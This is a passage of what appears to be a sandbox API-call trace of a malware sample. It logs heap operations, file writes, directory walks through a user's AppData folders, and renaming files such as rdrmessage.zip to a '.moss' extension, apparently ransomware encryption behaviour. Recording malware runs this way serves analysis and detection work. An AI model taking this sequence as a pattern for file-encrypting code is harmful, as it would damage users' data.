lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e838 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e820 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e7f0 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e7d8 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57ac8 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.946] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0xa5fa, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0xa5fa, lpOverlapped=0x0) returned 1 [0172.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0172.947] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa5ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.947] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0172.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0172.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0172.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0172.947] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0172.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0172.947] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0172.947] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0172.947] CloseHandle (hObject=0x664) returned 1 [0172.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f4d0 [0172.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8b0) returned 0x3b44498 [0172.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f4d0 | out: hHeap=0xcd0000) returned 1 [0172.949] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.moss")) returned 1 [0172.949] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.949] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.949] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.950] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdba388 | out: hHeap=0xcd0000) returned 1 [0172.950] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd6) returned 0xdba388 [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0172.951] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned="" [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdba388 | out: hHeap=0xcd0000) returned 1 [0172.951] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45fd8 | out: hHeap=0xcd0000) returned 1 [0172.951] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 0 [0172.951] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cf88 | out: hHeap=0xcd0000) returned 1 [0172.951] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0172.951] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0172.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.952] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cf88 [0172.952] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0172.952] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.952] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.952] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57ac8 [0172.953] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.953] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.953] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.953] PathFindFileNameW (pszPath="") returned="" [0172.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0172.953] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.954] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.954] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f4d0 [0172.954] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.954] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0172.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0172.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0172.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57ac8 [0172.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.955] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.955] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.955] PathFindFileNameW (pszPath="") returned="" [0172.955] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f418 [0172.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0172.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0172.957] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0172.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 